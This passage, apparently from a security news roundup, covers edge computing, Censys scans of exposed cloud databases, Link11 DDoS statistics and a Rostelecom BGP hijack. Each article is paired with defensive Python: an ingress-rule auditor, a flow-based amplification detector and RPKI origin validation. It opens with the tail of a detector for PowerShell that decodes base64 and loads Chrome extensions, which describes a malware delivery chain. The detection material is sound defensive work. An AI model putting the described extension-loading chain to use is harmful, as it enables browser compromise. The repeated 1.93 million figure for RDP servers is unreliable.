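def hosts_with_full_chain(events: Iterable[ProcEvent]) -> List[str]:
    """Hosts where every step was seen: one hit is a lead, all three is an incident."""
    return sorted(host for host, rules in detect(events).items() if CHAIN <= rules)


if __name__ == "__main__":
    print(detect(SAMPLE_EVENTS))
    print("full chain on:", hosts_with_full_chain(SAMPLE_EVENTS))
```

The decode step matters: matching on the base64 blob itself is brittle, while decoding it and looking for the download and load-extension verbs survives trivial re-encoding. The developer host shows why the Chrome rule also requires a PowerShell parent: --load-extension on its own is legitimate and common.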

The Future Comes With Promising Edge Technology, Say Experts

 

The huge volume of data continuously collected by the billions of sensors and devices that make up the IoT can overwhelm organizations that depend on primitive intelligence and analytics tools. Until recently these devices had little processing power of their own and relied on central servers, mostly public cloud servers that could be far away, to process their data. Today the same money buys far more computing power, which makes way for AI-powered devices at the edge that make their own decisions.

Experts predict that by 2025, 75% of enterprise-generated data will be created and processed at the edge, from driverless cars that process and analyse real-time traffic data without the cloud to factory systems that analyse sensor data for predictive maintenance. This rapid growth of smart devices at the edge will open up vast opportunities for businesses and users. The ability to automate, to store data for analysis close to its source, and to move data away from central servers is likely to deliver operational advantages, new and more effective services, and better scalability.

At the same time, the rapid growth of the edge requires security leaders to keep their discipline even as data becomes more distributed. It is important to understand the relationship between the edge and the IoT (Internet of Things): the edge lets computation run on the device or the local network rather than sending data to public cloud servers or central data centres for analysis, which takes time and costs resources.

Only the results then need to be sent on to their destination. Edge computing therefore reduces bandwidth demands and analyses data close to where it is produced. This is crucial for the IoT, where billions of sensors and systems across the world produce data, whether in connected home devices, health wearables or industrial machinery. "Especially for use cases like healthcare monitoring and safety apps – where milliseconds count – edge computing and cheaper, more powerful AI-powered devices are emerging as perfect partners to process the massive amounts of information generated by connected devices," reports HelpNetSecurity.

Cloud Misconfiguration is Still the Leading Source of Cloud Data Violations

 

Almost everybody is now working from home, and 84 percent of those surveyed are worried that the rapid move to 100 percent remote working has created new security vulnerabilities.

Cloud service providers have been accused of designing their administration panels' user interfaces to mislead customers and charge them for more services than they intended to buy.

Although this has never been demonstrated to be a systematic business strategy, reports and alerts about data breaches have flooded the internet in recent years after cloud-based databases were misconfigured and confidential information leaked.

Over the past month Censys, a security company that specialises in census-like scans of the internet, looked closely at cloud-based services to find out what the most likely sources of misconfiguration are for cloud-based businesses. Censys found more than 1.93 million cloud-hosted databases exposed to the public internet without a firewall or any other authentication measure. The company argues that threat actors will discover and target these databases using exploits for older vulnerabilities. In addition, a database that was exposed unintentionally may well have a weak password or none at all, opening it to anyone who finds its IP address.

Censys reported scanning for MySQL, Postgres, Redis, MSSQL, MongoDB, Elasticsearch, Memcached and Oracle, and that nearly 60 percent of all exposed servers were MySQL databases: 1.15 million of the 1.93 million exposed databases overall.

The company also searched for ports that cloud services expose for remote-management applications such as SSH, RDP, VNC, SMB, Telnet, TeamViewer and pcAnywhere. Censys maintained that these remote-management ports should not be reachable from the open internet but should be protected by access control lists, VPN tunnels or other traffic-filtering measures, because the underlying risk of such applications is precisely that the systems can be logged into remotely.

Another significant finding was that more than 1.93 million servers exposed their RDP login screens to the internet.

Microsoft and others have reported that many security breaches began with attackers gaining access to an enterprise through compromised RDP credentials. Those attacks came from a broad range of actors, including DDoS botnets, cryptomining operations, ransomware gangs and state-sponsored groups.

Most organizations do not rely on a single cloud provider but use several, and these may not share the same access controls or default settings, which lets systems become reachable even when IT staff did not intend it. While some cloud providers have improved their dashboards and clarified how these controls work, the terminology still differs substantially between providers, and some system administrators remain confused.

Censys said it “expects the issue of misconfigured services to remain a big problem for companies going forward.”
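The exposure Censys measured from the outside can be caught from the inside by auditing ingress rules before they are deployed. The following is an added example written for this page, not Censys' scanner or any provider's tooling: it takes security-group style ingress rules in a provider-neutral shape (the group names, port ranges and CIDRs are constructed), flags the database and remote-management ports from the report that are open to the whole internet, and shows the corrected form of each offending rule. The port numbers are the well-known defaults of those services.

```python
"""Audit ingress rules for the exposures Censys describes above.

Added example, not Censys' tooling. Checks security-group style ingress rules
(constructed below in a provider-neutral shape) for database and
remote-management ports reachable from anywhere, and returns a hardened copy
in which such rules are restricted to an administrative CIDR.
"""
import ipaddress
from typing import Dict, List, Tuple

# Default ports of the services Censys scanned for (well-known port assignments).
DATABASE_PORTS = {3306: "MySQL", 5432: "Postgres", 6379: "Redis", 1433: "MSSQL",
                  27017: "MongoDB", 9200: "Elasticsearch", 11211: "Memcached", 1521: "Oracle"}
REMOTE_MGMT_PORTS = {22: "SSH", 3389: "RDP", 5900: "VNC", 445: "SMB", 23: "Telnet"}
SENSITIVE_PORTS = {**DATABASE_PORTS, **REMOTE_MGMT_PORTS}

Rule = Dict[str, object]

# Constructed sample rules; "-1" means "all protocols" as some providers express it.
SAMPLE_RULES: List[Rule] = [
    {"group": "web-sg", "protocol": "tcp", "from_port": 443, "to_port": 443, "cidr": "0.0.0.0/0"},    # fine: public HTTPS
    {"group": "db-sg", "protocol": "tcp", "from_port": 3306, "to_port": 3306, "cidr": "10.0.0.0/8"},   # fine: internal only
    {"group": "cache-sg", "protocol": "tcp", "from_port": 6379, "to_port": 6379, "cidr": "::/0"},      # Redis open to all of IPv6
    {"group": "jump-sg", "protocol": "tcp", "from_port": 3389, "to_port": 3389, "cidr": "0.0.0.0/0"},  # RDP login screen on the internet
    {"group": "legacy-sg", "protocol": "-1", "from_port": 0, "to_port": 65535, "cidr": "0.0.0.0/0"},   # everything open
]


def is_world_open(cidr: str) -> bool:
    """0.0.0.0/0 and ::/0 are the only networks with prefix length 0."""
    return ipaddress.ip_network(cidr, strict=False).prefixlen == 0


def exposed_services(rules: List[Rule]) -> List[Tuple[str, int, str]]:
    """(group, port, service) for every sensitive port reachable from anywhere."""
    findings = []
    for r in rules:
        if r["protocol"] not in ("tcp", "-1") or not is_world_open(r["cidr"]):
            continue
        for port, service in SENSITIVE_PORTS.items():
            if r["from_port"] <= port <= r["to_port"]:
                findings.append((r["group"], port, service))
    return sorted(findings)


def harden(rules: List[Rule], admin_cidr: str) -> List[Rule]:
    """Copy of rules where world-open rules touching a sensitive port are limited to admin_cidr."""
    offending = {(g, p) for g, p, _ in exposed_services(rules)}
    hardened = []
    for r in rules:
        fixed = dict(r)
        if any(g == r["group"] and r["from_port"] <= p <= r["to_port"] for g, p in offending):
            fixed["cidr"] = admin_cidr
        hardened.append(fixed)
    return hardened


if __name__ == "__main__":
    for group, port, service in exposed_services(SAMPLE_RULES):
        print(f"{group}: {service} ({port}/tcp) open to the internet")
    print(harden(SAMPLE_RULES, "203.0.113.0/24"))
```

Two details are worth copying into a real check: the IPv6 catch-all ::/0 is as open as 0.0.0.0/0 and is routinely missed by rules that only match the IPv4 string, and a wide port range (the "legacy-sg" case) exposes every service at once even though no individual port was ever named in the rule.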

A resurgence in DDoS Attacks amidst Global COVID-19 lockdowns


Findings from Link11's Security Operations Center (LSOC) show a 97% increase in the number of attacks in April, May and June 2020 compared with the same period of the previous year, peaking at a 108% increase in May 2020.

The annual report also shows that the frequency of DDoS attacks depended on the day of the week and the time of day, with most attacks concentrated at weekends and in the evenings.

More attacks were registered on Saturdays, and out of office hours on weekdays. 

Marc Wilczek, COO, Link11 says, “The pandemic has forced organizations to accelerate their digital transformation plans, but has also increased the attack surface for hackers and criminals – and they are looking to take full advantage of this opportunity by taking critical systems offline to cause maximum disruption. This ‘new normal’ will continue to represent a major security risk for many companies, and there is still a lot of work to do to secure networks and systems against the volume attacks. Organizations need to invest in security solutions based on automation, AI, and Machine Learning that are designed to tackle multi-vector attacks and networked security mechanisms...” 


Key findings from the annual report include: 

Multi-vector attacks on the rise: 52% of attacks combined several attack vectors, making them harder to defend against. One attack used at least 14 techniques.

A growing number of reflection amplification vectors: the most commonly used vectors included DNS, CLDAP and NTP, while WS-Discovery and Apple Remote Control are still being used after being discovered in 2019.

DDoS sources for reflection amplification attacks are distributed around the globe: the top three source countries in H1 2020 were the USA, China and Russia. However, a growing number of attacks have been traced back to France.

The average attack bandwidth remains high: attack volume has levelled off at a relatively high average of 4.1 Gbps, and 80% of attacks reached up to 5 Gbps. The largest DDoS attack was stopped at 406 Gbps.

DDoS attacks from the cloud: at 47%, the share of DDoS attacks launched from cloud instances was higher than for the whole of 2019 (45%). Instances from every established provider were abused, but most often those of Microsoft Azure, AWS and Google Cloud.

The longest DDoS attack lasted 1,390 minutes, a little over 23 hours, while interval attacks, short bursts that rely on repetition like pinpricks, lasted 13 minutes on average.
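Reflection amplification traffic has a recognisable shape at the victim: it arrives over UDP from the reflector's well-known service port (53 for DNS, 389 for CLDAP, 123 for NTP, 3702 for WS-Discovery) in large packets, and a multi-vector attack shows several such ports hitting the same target at once. The following is an added example written for this page, not Link11's or LSOC's code; the flow records are constructed NetFlow-style samples and the packet-count and packet-size thresholds are illustrative values to tune against real traffic.

```python
"""Spot reflection/amplification vectors in flow records (added example, not Link11's code).

Reflected traffic reaches the victim from the reflector's well-known UDP
service port, so UDP flows whose source port is a known reflector service and
whose packets are large are attributed to that vector. SAMPLE_FLOWS are
constructed NetFlow-style records; thresholds are illustrative.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Well-known UDP service ports of reflection vectors named in the report (plus Memcached).
REFLECTOR_PORTS = {53: "DNS", 389: "CLDAP", 123: "NTP", 3702: "WS-Discovery", 11211: "Memcached"}


@dataclass(frozen=True)
class Flow:
    src_ip: str
    src_port: int
    dst_ip: str
    dst_port: int
    proto: str
    packets: int
    bytes: int


# Constructed: one victim under a three-vector attack, one host seeing only normal traffic.
SAMPLE_FLOWS = [
    Flow("203.0.113.5", 53, "198.51.100.10", 4444, "udp", 20000, 60_000_000),   # DNS reflection, ~3000 B/pkt
    Flow("203.0.113.6", 53, "198.51.100.10", 4444, "udp", 15000, 45_000_000),   # DNS reflection
    Flow("203.0.113.7", 123, "198.51.100.10", 4444, "udp", 30000, 14_400_000),  # NTP reflection, 480 B/pkt
    Flow("203.0.113.8", 389, "198.51.100.10", 4444, "udp", 10000, 30_000_000),  # CLDAP reflection
    Flow("192.0.2.53", 53, "198.51.100.20", 51234, "udp", 50, 6000),            # ordinary DNS answers, 120 B/pkt
    Flow("203.0.113.9", 443, "198.51.100.20", 51235, "tcp", 5000, 7_000_000),   # ordinary HTTPS
]


def amplification_vectors(flows: Iterable[Flow], min_packets: int = 100,
                          min_avg_bytes: int = 400) -> Dict[str, Dict[str, int]]:
    """{victim_ip: {vector: bytes}} for flows that look like reflected amplification traffic."""
    per_victim: Dict[str, Dict[str, int]] = defaultdict(lambda: defaultdict(int))
    for f in flows:
        if f.proto != "udp" or f.src_port not in REFLECTOR_PORTS:
            continue
        if f.packets < min_packets or f.bytes / f.packets < min_avg_bytes:
            continue  # small or few packets: normal request/response use of the service
        per_victim[f.dst_ip][REFLECTOR_PORTS[f.src_port]] += f.bytes
    return {v: dict(d) for v, d in per_victim.items()}


def multivector_victims(flows: Iterable[Flow], min_vectors: int = 2) -> List[str]:
    """Victims hit by at least min_vectors distinct vectors at once (the report's multi-vector case)."""
    return sorted(v for v, d in amplification_vectors(flows).items() if len(d) >= min_vectors)


def victim_gbps(flows: Iterable[Flow], window_seconds: float) -> Dict[str, float]:
    """Aggregate reflected bandwidth per victim over the collection window, in Gbit/s."""
    return {v: sum(d.values()) * 8 / window_seconds / 1e9
            for v, d in amplification_vectors(flows).items()}


if __name__ == "__main__":
    print(amplification_vectors(SAMPLE_FLOWS))
    print("multi-vector victims:", multivector_victims(SAMPLE_FLOWS))
    print("Gbit/s over a 10 s window:", victim_gbps(SAMPLE_FLOWS, 10))
```

The bytes-per-packet filter is what separates a reflector's amplified responses from the same port's everyday use: a resolver answering your own queries sends a few small packets, while a reflector abused against you sends thousands of near-MTU ones. Summing the attributed bytes over the flow window gives the per-victim bandwidth figure that the report's 4.1 Gbps average and 406 Gbps peak refer to.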


BGP Hijacking Attacks Google, Amazon and Other Famous Networks' Traffic!


According to reports, a Russian state-owned telecommunications provider rerouted traffic intended for some of the world's largest content delivery networks (CDNs) and cloud hosting providers.

The rerouting lasted about an hour and affected more than 8,500 internet traffic routes belonging to some of the best-known organisations.

Per sources, the affected brands include well-known names such as Cloudflare, Digital Ocean, Linode, Google, Joyent, Facebook, LeaseWeb, Amazon, GoDaddy and Hetzner.

Reportedly, all signs indicate that this was a case of Border Gateway Protocol (BGP) hijacking: the illegitimate takeover of IP prefixes by an attacker in order to redirect traffic.

This gives the hijacker a lot of power, because it can at any time announce that the servers of a particular company are on its network, with the result that, for example, all of Amazon's traffic ends up on the hijacker's servers.

In earlier times, when HTTPS was not yet widely used to encrypt traffic, BGP hijacking was a lucrative way to carry out man-in-the-middle (MitM) attacks and to intercept and modify traffic.

Today BGP hijacking is used instead to capture encrypted traffic for later analysis and decryption, on the assumption that the encryption protecting it will weaken over time.

This is not a new problem; it has troubled the internet for a couple of decades. Several projects aim to improve BGP's security, but there has not been much progress in hardening the protocol against such attacks.

Google's network has previously been the victim of a BGP hijack by a Nigerian entity. Researchers note that a BGP hijack is not necessarily malicious.

Reportedly, mistyping an Autonomous System Number (ASN), the number by which networks on the internet are identified, is one of the other main causes of BGP hijacks, and ends up accidentally redirecting traffic.

Per sources, China Telecom is among the top entities that have committed BGP hijacks, and not so accidentally. Another well-known name in this context is Rostelecom.

The last time Rostelecom attracted this much attention was when some of the largest financial players, including HSBC, Visa and MasterCard, were victims of a BGP hijack.

BGPMon had little to say about that earlier incident, but this time the Russian telecom's position is questionable, per sources. They also note that the hijack may have occurred after an internal Rostelecom traffic-shaping system accidentally exposed the wrong BGP routes.

Things took a turn for the worse when Rostelecom's upstream providers re-advertised the newly announced BGP routes across the web, greatly amplifying the hijack.

Researchers say it is very difficult to determine with certainty whether a BGP hijack was intentional or accidental. All that can be said is that the parties involved make the situation suspicious.
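Whether a hijack is deliberate or a fat-fingered ASN, the defence is the same: an upstream should not re-advertise a route whose origin contradicts what the prefix holder has published. The following is an added example written for this page, not BGPMon's tooling or any router vendor's implementation: it applies the RPKI route origin validation outcome of RFC 6811 (valid, invalid, not-found) to announcements using a set of ROAs, and then compares announcements with a baseline of expected origins to flag the two hijack shapes the text describes, a changed origin for a known prefix and a more-specific announcement from a foreign AS. The prefixes and ASNs are documentation ranges constructed for the example.

```python
"""Route origin validation and hijack alerting (added example, not BGPMon's tooling).

validate() implements the RFC 6811 outcome: 'valid' when a ROA covers the
prefix with the same origin AS and the announced length does not exceed the
ROA's maxLength, 'invalid' when ROAs cover it but none match, 'not-found'
when no ROA covers it. hijack_alerts() then flags announcements that
contradict a baseline of expected origins. All prefixes and ASNs below are
documentation ranges constructed for the example.
"""
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterable, List, Tuple


@dataclass(frozen=True)
class ROA:
    prefix: str
    max_length: int
    origin_asn: int


@dataclass(frozen=True)
class Route:
    prefix: str
    origin_asn: int


def _covers(outer_prefix: str, inner_net) -> bool:
    """True if inner_net lies within outer_prefix (same address family only)."""
    outer = ipaddress.ip_network(outer_prefix)
    return outer.version == inner_net.version and inner_net.subnet_of(outer)


def validate(route: Route, roas: Iterable[ROA]) -> str:
    net = ipaddress.ip_network(route.prefix)
    covering = [r for r in roas if _covers(r.prefix, net)]
    if not covering:
        return "not-found"
    for r in covering:
        if r.origin_asn == route.origin_asn and net.prefixlen <= r.max_length:
            return "valid"
    return "invalid"


def hijack_alerts(routes: Iterable[Route], roas: Iterable[ROA],
                  baseline: Dict[str, int]) -> List[Tuple[str, int, str, str]]:
    """(prefix, origin, kind, rpki_state) for announcements whose origin contradicts the baseline."""
    roas = list(roas)
    alerts = []
    for rt in routes:
        net = ipaddress.ip_network(rt.prefix)
        for base_prefix, base_asn in baseline.items():
            if not _covers(base_prefix, net) or rt.origin_asn == base_asn:
                continue
            base_len = ipaddress.ip_network(base_prefix).prefixlen
            kind = "more-specific" if net.prefixlen > base_len else "origin-change"
            alerts.append((rt.prefix, rt.origin_asn, kind, validate(rt, roas)))
    return alerts


# Constructed ROAs, historical baseline and a batch of announcements (documentation ASNs/prefixes).
ROAS = [ROA("203.0.113.0/24", 24, 64496), ROA("2001:db8::/32", 48, 64497)]
BASELINE = {"203.0.113.0/24": 64496, "2001:db8::/32": 64497}
SAMPLE_ROUTES = [
    Route("203.0.113.0/24", 64496),   # legitimate announcement
    Route("203.0.113.0/25", 64496),   # holder deaggregating past maxLength: invalid, but not a hijack
    Route("203.0.113.0/25", 64511),   # more-specific from a foreign AS: the classic hijack shape
    Route("2001:db8::/32", 64511),    # same prefix, different origin
    Route("2001:db8:1::/48", 64497),  # within maxLength, legitimate
    Route("198.51.100.0/24", 64510),  # no ROA and no baseline: nothing to judge against
]


if __name__ == "__main__":
    for rt in SAMPLE_ROUTES:
        print(rt.prefix, "AS" + str(rt.origin_asn), validate(rt, ROAS))
    print(hijack_alerts(SAMPLE_ROUTES, ROAS, BASELINE))
```

Note that the more-specific /25 from a foreign AS wins in the routing table over the legitimate /24 by longest-match regardless of any AS path, which is why an upstream that re-advertises it amplifies the hijack; dropping RPKI-invalid routes at that upstream is what would have contained the incident described above. The "not-found" outcome is the honest gap: a prefix with no ROA gets no protection from origin validation at all.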